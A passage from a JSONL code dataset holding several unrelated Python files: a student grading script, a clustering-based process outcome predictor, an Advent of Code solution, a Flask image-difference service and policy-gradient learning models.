result\n","repo_name":"magnusdahlgren/magnetizer","sub_path":"magnetizer/mutil.py","file_name":"mutil.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"4179792867","text":"# Subprograma\n\ndef listaAprovadosReprovados2(infos, minimo):\n for pos in range(len(infos)):\n media = (infos[pos][1][0]+infos[pos][1][1]+infos[pos][1][2])/3\n\n if media >= minimo:\n print(infos[pos][0], \"Aprovado com nota:\", media)\n\n print(\"-----------------------------------------------------------\")\n for pos in range(len(infos)):\n media = (infos[pos][1][0] + infos[pos][1][1] + infos[pos][1][2]) / 3\n\n if media < minimo:\n print(infos[pos][0], \"Reprovado com nota:\", media)\n\n return None\n\ndef leAlunosComNotas(qtdAlunos, qtdNotas):\n resposta = [] # inicializa a resposta como uma lista vazia\n\n for indAluno in range(qtdAlunos):\n nome = input(\"Diga o nome do aluno \" + str(indAluno + 1) + \": \")\n linha = [nome,[]] # cada linha tem um nome e uma lista vazia de notas\n\n for indNota in range(qtdNotas):\n nota = float(input(\"Diga a nota \" + str(indNota + 1) + \" = \"))\n linha[1].append(nota) # anexa ao final da lista de notas a nota lida\n\n resposta.append(linha) # anexa ao final da lista a linha com nome e notas\n\n return resposta\n\n# Programa Principal\n\nresultados = leAlunosComNotas(5,3)\nlistaAprovadosReprovados2(resultados, 6.0)","repo_name":"thcborges/CompCEDERJ-FP","sub_path":"Aulas/Aula 05/aula05-alunosAprovadosEntradaDinamica.py","file_name":"aula05-alunosAprovadosEntradaDinamica.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73099072759","text":"from FrequencyEncoder import FrequencyEncoder\nfrom LastStateEncoder import LastStateEncoder\nfrom sklearn.cluster import KMeans\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport time\nfrom datetime import datetime, timedelta\nimport numpy as np\n\nclass ClusteringPredictiveModel:\n \n def __init__(self, case_id_col, event_col, label_col, timestamp_col, cat_cols, numeric_cols, n_clusters,n_sub_family, n_estimators, random_state=22, fillna=True, pos_label=\"A_Pending\"):\n \n # columns\n self.case_id_col = case_id_col\n self.label_col = label_col\n self.pos_label = pos_label\n self.avg_sys=0\n self.avg_usr=0\n self.n_clusters = n_clusters\n \n self.freq_encoder = FrequencyEncoder(case_id_col, event_col)\n self.data_encoder = LastStateEncoder(case_id_col, timestamp_col, cat_cols, numeric_cols, fillna)\n self.clustering = KMeans(n_clusters, random_state=random_state)\n self.sub_clustering = KMeans(n_sub_family, random_state=random_state)\n self.clss = [RandomForestClassifier(n_estimators=n_estimators, random_state=random_state) for _ in range(n_clusters*n_sub_family)]\n \n self.avg_time_train=np.zeros(n_clusters)\n self.avg_all_train=0\n self.avg_time_test=np.zeros(n_clusters)\n self.avg_all_test=0\n self.n_sub_family=n_sub_family\n self.sys=np.zeros(n_clusters*n_sub_family)\n self.usr=np.zeros(n_clusters*n_sub_family)\n self.tot=np.zeros(n_clusters*n_sub_family)\n\n def throughput(self,x): #for one case\n i=x.index[0]\n t1=x['Start Timestamp'][i]\n t= time.strptime(t1, \"%Y/%m/%d %H:%M:%S.%f\")\n i+=1\n sys=0 # delay by system\n usr=0 # delay by user\n system=True\n while i < x.index.max():\n #print('before ', i)\n if x['Activity'][i]=='O_Sent (mail and online)' or x['Activity'][i]=='O_Sent (online only)':\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n s=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n sys+=86400 * s.days + s.seconds\n system=False\n t=t2\n #print('send ',sys)\n\n if x['Activity'][i]=='A_Validating' :\n t2=x['Start Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n u=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n usr+=86400 * u.days + u.seconds\n system=True\n t=t2\n #print('val :',usr)\n\n i+=1\n #print(i)\n if i==x.index.max():\n if system:\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n s=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n sys+=86400 * s.days + s.seconds\n #print('final sys ',sys)\n else:\n t2=x['Complete Timestamp'][i]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n u=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n usr+=86400 * u.days + u.seconds\n #print('fainal usr ',usr)\n \n return np.array([sys,usr])\n\n def execution_time(self,x): #for one case\n t=x['Start Timestamp'][x.index.min()]\n t = time.strptime(t, \"%Y/%m/%d %H:%M:%S.%f\")\n t2=x['Complete Timestamp'][x.index.max()]\n t2 = time.strptime(t2, \"%Y/%m/%d %H:%M:%S.%f\")\n exe=datetime.fromtimestamp(time.mktime(t2))-datetime.fromtimestamp(time.mktime(t))\n return (86400 * exe.days + exe.seconds)\n\n def average_in_cluster(self,x):\n return np.mean(x['sys']+x['usr'])\n\n def sub_family(self,x):# for one case\n if x['sys'][0]>self.avg_sys and x['usr'][0]>self.avg_usr: #ss\n return 0\n elif x['sys'][0]>self.avg_sys and x['usr'][0]<self.avg_usr: #sf\n return 1\n elif x['sys'][0]<self.avg_sys and x['usr'][0]>self.avg_usr: #fs\n return 2\n elif x['sys'][0]<self.avg_sys and x['usr'][0]<self.avg_usr: #ff\n return 3 \n\n\n def fit(self, X, y=None):\n \n # encode events as frequencies\n data_freqs = self.freq_encoder.fit_transform(X)\n \n # cluster traces according to event frequencies \n cluster_assignments = self.clustering.fit_predict(data_freqs)\n \n #avg_grouping=X.groupby(self.case_id_col)\n #ex=avg_grouping.apply(lambda x: execution_time(x))\n #self.avg=ex.mean()\n \n #avg_grouping1=X.groupby(['Case ID'])\n #avg1=avg_grouping1.apply(lambda x: self.throughput(x))\n #self.avg_sys=np.mean([avg1[p][0] for p in range(len(avg1))])\n #self.avg_usr=np.mean([avg1[p][1] for p in range(len(avg1))])\n\n \n # train classifier for each cluster\n shift=0\n for cl in range(self.n_clusters):\n\n #print('Distribution of cluster ',cl,':', end='')\n cases = data_freqs[cluster_assignments == cl].index\n tmp = X[X[self.case_id_col].isin(cases)]\n tmp = self.data_encoder.transform(tmp)\n self.avg_time_train[cl]=self.average_in_cluster(tmp)\n sub_fammily_assignments=self.sub_clustering.fit_predict(tmp[['usr']])\n mean=0\n for s_cl in range (self.n_sub_family):\n print('cluster ',s_cl+shift,':', end='')\n s_cases=tmp[sub_fammily_assignments==s_cl]['Case ID']\n tempo=tmp[tmp[self.case_id_col].isin(s_cases)]\n self.clss[s_cl+shift].fit(tempo.drop([self.case_id_col, self.label_col,'sys','usr'], axis=1), tempo[self.label_col])\n avg=int(round(self.average_in_cluster(tempo)/86400))\n avg_usr=int(round(np.mean(tempo['usr'])/86400))\n avg_sys=int(round(np.mean(tempo['sys'])/86400))\n self.sys[s_cl+shift]=avg_sys\n self.usr[s_cl+shift]=avg_usr\n self.tot[s_cl+shift]=avg\n print(' ',len(tempo),' avg: ',avg,' client ',avg_usr,' system ',avg_sys)\n #mean+=avg\n \t#print(' ',len(tempo),end='')\n shift+=self.n_sub_family\n #print(' avg_tot ',round(mean/self.n_sub_family))\n print('')\n return self\n \n\n def predict_proba(self, X):\n \n # encode events as frequencies\n data_freqs = self.freq_encoder.transform(X)\n \n # calculate closest clusters for each trace \n cluster_assignments = self.clustering.predict(data_freqs)\n \n # predict outcomes for each cluster\n cols = [self.case_id_col]+list(['A_Pending','A_Denied','A_Cancelled'])\n preds = pd.DataFrame(columns=cols)\n self.actual = pd.DataFrame(columns=cols)\n shift=0\n self.avg_time_test=np.zeros(self.n_clusters)\n for cl in range(self.n_clusters):\n #print('Distribution of cluster ',cl,':',end='')\n\n # select cases belonging to given cluster\n cases = data_freqs[cluster_assignments == cl].index\n if len(cases):\n tmp = X[X[self.case_id_col].isin(cases)]\n \n # encode data attributes\n\n tmp = self.data_encoder.transform(tmp)\n sub_fammily_assignments=self.sub_clustering.predict(tmp[['usr']])\n mean=0\n for s_cl in range(self.n_sub_family):\n s_cases=tmp[sub_fammily_assignments==s_cl]['Case ID']\n if len(s_cases)>0:\n print('cluster ',s_cl+shift,':',end='')\n\n tempo=tmp[tmp[self.case_id_col].isin(s_cases)]\n new_preds = pd.DataFrame(self.clss[s_cl+shift].predict_proba(tempo.drop([self.case_id_col, self.label_col,'sys','usr'], axis=1)))\n new_preds.columns = self.clss[s_cl+shift].classes_\n new_preds[self.case_id_col] = tempo.droplevel(1).index\n preds = pd.concat([preds, new_preds], axis=0, ignore_index=True,sort=False)\n actuals = pd.get_dummies(tempo[self.label_col])\n actuals[self.case_id_col] = tempo[self.case_id_col]\n self.actual = pd.concat([self.actual, actuals], axis=0, ignore_index=True,sort=False)\n avg=int(round(self.average_in_cluster(tempo)/86400))\n #mean+=avg\n avg_usr=int(round(np.mean(tempo['usr'])/86400))\n avg_sys=int(round(np.mean(tempo['sys'])/86400))\n if len(s_cases)==1:\n sys=self.sys[s_cl+shift]-avg_sys\n usr=self.usr[s_cl+shift]-avg_usr\n tot=self.tot[s_cl+shift]-avg\n if sys>=0:\n print('')\n print('Remaining time system: ',sys, 'day(s)')\n else:\n print('Delay time system: ',-sys, 'day(s)')\n if usr>=0:\n print('Remaining time client: ',usr, 'day(s)')\n else:\n print('Delay time client: ',-usr, 'day(s)') \n if tot>=0:\n print('Remaining time (total): ',tot, 'day(s)')\n else:\n print('Delay time (total): ',-tot, 'day(s)') \n\n\n print(' ',len(tempo),' avg: ',avg,' client ',avg_usr,' system ',avg_sys)\n \n #print(' ',len(tempo),end='')\n #else:\n \t#print('cluster ',s_cl+shift,':',0,' avg: ',0)\n shift+=self.n_sub_family\n #print(' avg_tot ',round(mean/self.n_sub_family))\n print('')\n else:\n shift+=self.n_sub_family\n preds.fillna(0, inplace=True)\n self.actual.fillna(0, inplace=True)\n #self.actual = self.actual[self.pos_label]\n \n #return preds[self.pos_label]\n return preds \n","repo_name":"Nani-mido/KMeans-client-sys-throughput-time","sub_path":"ClusteringPredictiveModel.py","file_name":"ClusteringPredictiveModel.py","file_ext":"py","file_size_in_byte":10514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39754693093","text":"from collections import defaultdict\n\n\nwith open('input') as f:\n lines = f.read().split('\\n')\nlines = [_ for _ in lines if _]\n\noo = []\noo_list = lines\n\ncoo = []\ncoo_list = lines\n\n\nfor i in range(len(lines[0])):\n c = defaultdict(list)\n if len(oo_list) == 1:\n oo = oo_list[0]\n break\n for word in oo_list:\n c[word[i]].append(word)\n\n if len(c['0']) > len(c['1']):\n oo_list = c['0']\n\n oo.append('0')\n else:\n oo_list = c['1']\n oo.append('1')\n\n\nfor i in range(len(lines[0])):\n if len(coo_list) == 1:\n coo = coo_list[0]\n break\n c = defaultdict(list)\n for word in coo_list:\n c[word[i]].append(word)\n\n if len(c['0']) <= len(c['1']):\n coo_list = c['0']\n coo.append('0')\n else:\n coo_list = c['1']\n coo.append('1')\n\ncoo = int(''.join(coo),2)\noo =int(''.join(oo), 2)\nprint(coo * oo)\n","repo_name":"z03h/aoc","sub_path":"2021/03/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2108880223","text":"from gevent import monkey\nif True:\n monkey.patch_all()\n\nimport os\nimport io\nimport uuid\nfrom flask import Flask, request, send_file\nfrom werkzeug.utils import secure_filename\nfrom compare import get_difference, create_difference_image\n\napp = Flask(__name__)\n\n\n@app.route('/difference', methods=['GET'])\ndef difference():\n \"\"\" Gets the structural similarity index between two images\n\n Args:\n file_old: the old file object\n file_new: the new file object\n\n Returns:\n Image structural similarity index\n\n \"\"\"\n # Save both image\n file_old = request.files['file_old']\n file_ID_old = secure_filename(file_old.filename)\n file_path_old = os.path.join('files', file_ID_old)\n file_path_old = os.path.abspath(file_path_old)\n file_old.save(file_path_old)\n\n file_new = request.files['file_new']\n file_ID_new = secure_filename(file_new.filename)\n file_path_new = os.path.join('files', file_ID_new)\n file_path_new = os.path.abspath(file_path_new)\n file_new.save(file_path_new)\n\n # Get structural similarity index\n print(f\"Getting difference between {file_ID_old} and {file_ID_new}\")\n result = str(get_difference(file_path_old, file_path_new))\n print(f\"Done difference between {file_ID_old} and {file_ID_new}\")\n\n # Remove two downloaded files\n os.remove(file_path_old)\n os.remove(file_path_new)\n\n return result\n\n\n@app.route('/difference_image', methods=['GET'])\ndef difference_image():\n \"\"\" Gets an image with bounding boxes with the difference between file_old and file_new\n\n Args:\n file_old: the old file object\n file_new: the new file object\n\n Returns:\n difference image with bounding boxes\n \"\"\"\n\n # Save both image\n file_old = request.files['file_old']\n file_ID_old = secure_filename(file_old.filename)\n file_path_old = os.path.join('files', file_ID_old)\n file_path_old = os.path.abspath(file_path_old)\n file_old.save(file_path_old)\n\n file_new = request.files['file_new']\n file_ID_new = secure_filename(file_new.filename)\n file_path_new = os.path.join('files', file_ID_new)\n file_path_new = os.path.abspath(file_path_new)\n file_new.save(file_path_new)\n\n file_path_difference = os.path.join('files', f'{uuid.uuid4()}.png')\n file_path_difference = os.path.abspath(file_path_difference)\n\n print(f\"Getting difference image between {file_ID_old} and {file_ID_new}\")\n create_difference_image(file_path_old, file_path_new, file_path_difference)\n print(f\"Done difference image between {file_ID_old} and {file_ID_new}\")\n\n # Remove two downloaded files\n os.remove(file_path_old)\n os.remove(file_path_new)\n\n # Buffer file into memmory\n # differece_image_buffer = io.BytesIO()\n # with open(file_path_difference, 'rb') as f:\n # differece_image_buffer.write(f.read())\n # differece_image_buffer.seek(0)\n # os.remove(file_path_difference)\n\n return send_file(file_path_difference, mimetype='image/gif')\n\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', port=8002, debug=True)\n","repo_name":"felixjchen/web-watcher","sub_path":"src/compare/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44094827865","text":"## Setup a package for qlearning models\n\nimport numpy as np # for numerical operations\nimport scipy.optimize as opt # for numerical optimization\n\n## STRUCTURE OF PARAMS\n# params = [learning_param1, learning_param2, ..., learning_paramN, model_param1, model_param2, ..., model_paramM]\n \nclass VLPolicyGradient():\n \"\"\"\n Single State Policy gradient model with logistic policy\n Serve as a base class for the different policy gradient models\n \"\"\"\n def __init__(self,eps=1e-6,dx=0.01):\n \"\"\"\n eps: a small number to prevent error for choice probabilities\n dx: the step size for numerical derivatives\n \"\"\"\n self.eps = eps\n self.dx = dx\n\n def policy(self, params):\n \"\"\"\n The policy function\n params: the parameters of the model\n \"\"\"\n params = np.array(params)\n theta = params[0]\n logistic = lambda x: 1/(1+np.exp(-x))\n policy = np.array([logistic(theta), 1-logistic(theta)])\n policy = np.clip(policy, self.eps, 1-self.eps)\n return policy\n \n def log_policy(self, params):\n \"\"\"\n The log policy function\n params: the parameters of the model\n \"\"\"\n return np.log(self.policy(params))\n \n def del_log_policy(self, params):\n \"\"\"\n The numerical derivative of the log policy function\n params: the parameters of the model\n \"\"\"\n n_params = len(params)\n del_log_policy = np.zeros((n_params,2))\n for i in range(n_params):\n param_plus = params.copy()\n param_plus[i] = param_plus[i] + self.dx\n param_minus = params.copy()\n param_minus[i] = param_minus[i] - self.dx\n del_log_policy[i] = (self.log_policy(param_plus) - self.log_policy(param_minus))/(2*self.dx)\n return del_log_policy\n\n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n alpha = params[0]\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha*reward*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n except:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:]\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def prob_choice(self, params, choices, rewards):\n \"\"\"\n Return the probability of the choices given the parameters\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = self.policy_gradient_learning(choices, rewards, params)\n ps = np.zeros((len(choices)+1,2))\n for n, policy_param in enumerate(policy_params):\n ps[n] = self.policy(policy_param)\n return ps\n\n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha', 'theta'],\n 'suggested_bounds': [(0,1),(-10,10)],\n 'suggested_init': [0.5,0.],\n 'n_l': 1, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props\n \n def regularizer(self, params):\n \"\"\"\n Calculate the regularizer\n \"\"\"\n return 0\n\n def nll(self, params, choices, rewards):\n \"\"\" \n Calculate the negative log likelihood\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n lls = []\n for i in range(len(choices)):\n # remove after first nan\n if np.any(np.isnan(choices[i])):\n cs = choices[i][:np.argmax(np.isnan(choices[i]))]\n else:\n cs = choices[i]\n if np.any(np.isnan(rewards[i])):\n rs = rewards[i][:np.argmax(np.isnan(rewards[i]))]\n else:\n rs = rewards[i]\n assert len(cs) == len(rs), 'choices and rewards must be same length'\n # calculate the probability of each choice\n ps = self.prob_choice(cs, rs, params)[:-1,:]\n # calculate the log likelihood\n lls.append(np.sum(cs * np.log(ps[:,1]) + (1-cs) * np.log(ps[:,0])))\n # return the summation of negative log likelihood\n sum_lls = -np.sum(lls)\n return sum_lls\n \n def normll(self, params, choices, rewards):\n \"\"\"\n Calculate the normalized log likelihood\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n normlls = []\n for i in range(len(choices)):\n # remove after first nan\n if np.any(np.isnan(choices[i])):\n cs = choices[i][:np.argmax(np.isnan(choices[i]))]\n else:\n cs = choices[i]\n if np.any(np.isnan(rewards[i])):\n rs = rewards[i][:np.argmax(np.isnan(rewards[i]))]\n else:\n rs = rewards[i]\n assert len(cs) == len(rs), 'choices and rewards must be same length'\n # calculate the probability of each choice\n ps = self.prob_choice(cs, rs, params)[:-1,:]\n # calculate the log likelihood\n normlls.append(np.exp(np.mean(cs * np.log(ps[:,1]) + (1-cs) * np.log(ps[:,0]))))\n # return the average of normalized log likelihood\n mean_normlls = np.mean(normlls)\n return mean_normlls\n \n def nll_reg(self, params, choices, rewards, lambda_reg):\n \"\"\"\n Calculate the negative log likelihood with regularization\n params: the parameters of the q learning model\n choices: the choices made\n rewards: the rewards received\n lambda_reg: the regularization parameter\n \"\"\"\n return self.nll(params, choices, rewards) + self.regularizer(params) * lambda_reg\n \n def fit_all(self, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to the data\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm \n \"\"\"\n if algo == 'shgo':\n bounds = kwargs['bounds']\n # remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with shgo algorithm')\n res = opt.shgo(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),bounds=bounds,**kwargs)\n elif algo == 'de':\n bounds = kwargs['bounds']\n # remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with differential evolution algorithm')\n res = opt.differential_evolution(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),bounds=bounds,**kwargs)\n elif algo == 'basinhopping':\n bounds = kwargs['bounds']\n # remove bounds from kwargs\n kwargs = {k: v for k, v in kwargs.items() if k != 'bounds'}\n print('Starting optimization with basinhopping algorithm')\n res = opt.basinhopping(\n self.nll_reg,\n params_init,\n minimizer_kwargs={'args':(choices, rewards, lambda_reg)},**kwargs)\n elif algo == 'da':\n print('Starting optimization with dual annealing algorithm')\n res = opt.dual_annealing(\n self.nll_reg,\n args=(choices, rewards, lambda_reg),**kwargs)\n elif algo == 'minimize':\n assert 'randomize' in kwargs.keys(), 'Must specify whether to randomize initial parameters using \"randomize\" variable'\n assert 'n_restarts' in kwargs.keys(), 'Must specify number of restarts using \"n_restarts\" variable'\n res_list = []\n for X in range(kwargs['n_restarts']):\n print('Starting optimization with minimize. Iteration: {} of {}'.format(X+1,kwargs['n_restarts']))\n bounds = kwargs['bounds']\n if kwargs['randomize']:\n # resample initial parameters\n for i in range(len(params_init)):\n params_init[i] = np.random.uniform(bounds[i][0],bounds[i][1])\n # remove randomize and bounds from kwargs\n kwargs_alt = {k: v for k, v in kwargs.items() if k not in ['randomize','bounds','n_restarts']}\n res = opt.minimize(\n self.nll_reg,\n params_init,\n args=(choices, rewards, lambda_reg),**kwargs_alt)\n res_list.append(res)\n # find best result\n res = res_list[np.argmin([r.fun for r in res_list])]\n else:\n raise ValueError('Invalid algorithm')\n return res\n \n def fit_subject(self, subject, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to a single subject\n subject: the subject to fit the model to\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n res = self.fit_all(\n choices[subject:subject+1], rewards[subject:subject+1], params_init, lambda_reg, algo, **kwargs\n )\n return res\n\n def fit_all_except(self, subject, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to all subjects except one\n subject: the subject to exclude\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n assert subject < len(choices), 'subject must be less than number of subjects'\n res = self.fit_all(\n np.concatenate((choices[:subject],choices[subject+1:])),\n np.concatenate((rewards[:subject],rewards[subject+1:])),\n params_init, lambda_reg, algo, **kwargs\n )\n return res\n \n def fit_every_nth(self, start:int, K:int, choices, rewards, params_init, lambda_reg=0, algo='de', **kwargs):\n \"\"\"\n Fit the model to every Kth subject\n start: the starting subject\n K: the number of subjects to skip\n choices: the choices made\n rewards: the rewards received\n params_init: the initial parameters of the q learning model\n lambda_reg: the regularization parameter\n algo: the optimization algorithm to use\n kwargs: the keyword arguments for the optimization algorithm\n \"\"\"\n assert start < K, 'start must be less than K'\n choices = choices[start::K]\n rewards = rewards[start::K]\n res = self.fit_all(choices, rewards, params_init, lambda_reg, algo, **kwargs)\n return res\n \n# extend the policy gradient model to include a softmax function\nclass VSPolicyGradient(VLPolicyGradient):\n \"\"\"\n Policy gradient model with softmax function\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01):\n super().__init__(eps, dx)\n\n def policy(self, params):\n \"\"\"\n Calculate the policy\n params: the parameters of the policy gradient model\n \"\"\"\n # calculate the probability of choosing each action\n params = np.array(params)\n theta_0, theta_1 = params[0], params[1]\n softmax = lambda t0, t1: np.exp(t0)/(np.exp(t0)+np.exp(t1))\n policy = np.array([softmax(theta_0, theta_1), 1-softmax(theta_0, theta_1)])\n policy = np.clip(policy, self.eps, 1-self.eps)\n return policy\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_l: the number of learning parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha', 'theta_0', 'theta_1'],\n 'suggested_bounds': [(0,1),(-10,10),(-10,10)],\n 'suggested_init': [0.5,0.,0.],\n 'n_l': 1, # number of learning parameters\n 'n_p': 2 # number of policy parameters\n }\n return param_props\n \nclass ACLPolicyGradient(VLPolicyGradient):\n \"\"\"\n Actor-critic policy gradient model with logistic policy\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01,q_type='q'):\n super().__init__(eps, dx)\n assert q_type in ['q','fq','osfq'], 'q_type must be one of q, fq, osfq'\n self.q_type = q_type\n \n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n\n if self.q_type == 'q':\n alpha_p,alpha_q,qs = params[0], params[1], params[2:4]\n elif self.q_type == 'fq':\n alpha_p,alpha_q,alpha_q_forget,qs = params[0], params[1], params[2], params[3:5]\n elif self.q_type == 'osfq':\n alpha_p,alpha_q,alpha_q_forget,kappa,qs = params[0], params[1], params[2], params[3], params[4:6]\n\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha_p*qs[int(choice)]*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n \n if reward != 0:\n qs[int(choice)] = qs[int(choice)] + alpha_q*(reward-qs[int(choice)])\n else:\n if 'os' in self.q_type:\n qs[int(choice)] = qs[int(choice)] + alpha_q*(kappa-qs[int(choice)])\n else:\n qs[int(choice)] = qs[int(choice)] * (1-alpha_q)\n\n qs[int(choice)] = qs[int(choice)] + alpha_q*(reward-qs[int(choice)])\n if 'f' in self.q_type:\n qs[1-int(choice)] = qs[1-int(choice)]*(1-alpha_q_forget)\n \n if self.q_type == 'q':\n new_params[2:4] = qs.copy()\n elif self.q_type == 'fq':\n new_params[3:5] = qs.copy()\n elif self.q_type == 'osfq':\n new_params[4:6] = qs.copy()\n except:\n pass\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha_policy', 'alpha_Q_value'] + ([] if self.q_type == 'q' else ['alpha_Q_forget'] if self.q_type == 'fq' else ['alpha_Q_forget','kappa']) +\n ['Q_0', 'Q_1','theta'],\n 'suggested_bounds': [(0,1),(0,1)]+ ([] if self.q_type == 'q' else [(0,1)] if self.q_type == 'fq' else [(0,1),(0,1)]) +\n [(0,1),(0,1),(-10,10)],\n 'suggested_init': [0.5,0.5] + ([] if self.q_type == 'q' else [0.5] if self.q_type == 'fq' else [0.5,0.5]) + \n [0.,0.,0.],\n 'n_l': 4 if self.q_type == 'q' else 5 if self.q_type == 'fq' else 6, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props\n\nclass AdvLPolicyGradient(VLPolicyGradient):\n \"\"\"\n Advantage learning policy gradient model with logistic policy\n \"\"\"\n def __init__(self, eps=1e-6, dx=0.01):\n super().__init__(eps, dx)\n \n def policy_update(self, choice, reward, params):\n \"\"\"\n The policy update function\n params: the parameters of the model\n choice: the choice made\n reward: the reward received\n \"\"\"\n params = np.array(params)\n alpha_p,alpha_v,v = params[0], params[1], params[2]\n new_params = params.copy()\n try:\n new_params[self.param_props()['n_l']:] = params[self.param_props()['n_l']:] + alpha_p*(reward-v)*self.del_log_policy(params[self.param_props()['n_l']:])[:,int(choice)]\n v = v + alpha_v*(reward-v)\n new_params[2] = v\n except:\n pass\n return new_params\n \n def policy_gradient_learning(self, choices, rewards, params):\n \"\"\"\n The policy gradient learning function\n params: the parameters of the model\n choices: the choices made\n rewards: the rewards received\n \"\"\"\n policy_params = np.zeros((len(choices)+1,len(params[self.param_props()['n_l']:])))\n policy_params[0] = params[self.param_props()['n_l']:]\n new_params = params.copy()\n for n, (choice, reward) in enumerate(zip(choices, rewards)):\n new_params = self.policy_update(choice, reward, new_params)\n policy_params[n+1] = new_params[self.param_props()['n_l']:]\n return policy_params\n \n def param_props(self):\n \"\"\"\n Return the parameter properties\n names: the names of the parameters\n suggested_bounds: the suggested bounds for the parameters\n suggested_init: the suggested initial values for the parameters\n n_p: the number of policy parameters\n \"\"\"\n param_props = {\n 'names': ['alpha_policy', 'alpha_value', 'V','theta'],\n 'suggested_bounds': [(0,1),(0,1),(0,1),(-10,10)],\n 'suggested_init': [0.5,0.5,0.0,0.0],\n 'n_l': 3, # number of learning parameters\n 'n_p': 1 # number of policy parameters\n }\n return param_props","repo_name":"neurorishika/HetGOQL","sub_path":"pygorl/cogpolicy.py","file_name":"cogpolicy.py","file_ext":"py","file_size_in_byte":20174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585372801","text":"# 2022/09/25 Baek 2293\n\nINF = 